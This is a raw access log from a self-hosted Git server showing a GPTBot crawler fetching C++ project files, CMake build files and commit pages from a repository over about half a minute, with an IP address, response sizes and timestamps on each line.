"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" -[17/Feb/2026:15:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11113] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10167] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10164] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" -[17/Feb/2026:15:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13480] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11879] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11876] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:13:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10696] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" -[17/Feb/2026:15:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:13:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode" -[17/Feb/2026:15:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode" -[17/Feb/2026:15:13:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode" -[17/Feb/2026:15:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode" -[17/Feb/2026:15:13:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode" -[17/Feb/2026:15:13:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10011] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11067] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11066] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11069] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr 